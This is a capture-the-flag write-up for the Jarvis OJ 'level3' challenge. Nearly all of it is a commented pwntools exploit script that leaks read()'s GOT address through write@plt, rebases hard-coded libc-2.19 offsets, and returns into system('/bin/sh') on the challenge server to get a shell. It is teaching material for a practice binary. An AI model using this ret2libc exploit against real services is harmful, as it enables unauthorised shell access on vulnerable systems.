Jarvis OJ-level3

使用ret2libc攻击方法绕过数据执行保护

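from pwn import*
conn = remote("pwn2.jarvisoj.com",9879)

elf = ELF('level3')
libc = ELF('libc-2.19.so')   # loaded but never used below: the libc offsets are hard-coded further down

# Stage 1 - leak a libc pointer.
# The overflow returns into write@plt (no shellcode is placed on the stack, which is why
# NX/DEP does not help here) and calls write(1, got_read, 4), printing the GOT slot of
# read(). That slot holds read()'s runtime address in the randomised libc, which is what
# stage 2 rebases against. The fixed plt/got addresses below only hold because the binary
# is not position-independent; a PIE build or a stack canary would break this stage.
plt_write = elf.symbols['write']  #0804834
print('plt_write = ' + hex(plt_write))
got_read = elf.got['read']  #0804A00C
print('got_read = ' + hex(got_read))

payload = b'a' * 0x8C             # padding up to the saved return address
payload += p32(plt_write)         # overwritten return address -> write@plt
payload += p32(0x0804844B)        # return address for write(); presumably re-enters the vulnerable read so the second payload below is accepted -- confirm in the disassembly
payload += p32(1)                 # fd  = stdout
payload += p32(got_read)          # buf = GOT entry of read()
payload += p32(4)                 # len = one 32-bit pointer

conn.recvuntil(b"Input:\n")       # the prompt literal was split across two lines in the transcription; "\n" restored
conn.send(payload)
temp = conn.recv(4)
read_addr = u32(temp[0:4])
print('read_addr = ' + hex(read_addr))

# Stage 2 - rebase the known libc-2.19 offsets onto the leaked address.
# offset is the libc load base: leaked read() address minus read()'s offset inside the file.
libc_read_addr = 0x000daf60             #readelf -a ./libc-2.19.so | grep "read@"
offset = read_addr - libc_read_addr
libc_system_addr = 0x00040310           #readelf -a ./libc-2.19.so | grep "system@"
system_addr = offset + libc_system_addr
libc_binsh_addr = 0x16084c              #strings -a -t x .//libc-2.19.so' | grep "/bin/sh"
binsh_addr = offset + libc_binsh_addr

ret = 0x08048480    # return address system() will use; its value is irrelevant to the shell itself

# Stage 3 - classic 32-bit ret2libc frame: [padding][system][ret][&"/bin/sh"]
payload = b'a' * 0x8C + p32(system_addr) + p32(ret) + p32(binsh_addr)
conn.send(payload)
conn.interactive()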

  

Always believe that good things will come.
原文地址:https://www.cnblogs.com/elvirangel/p/6858120.html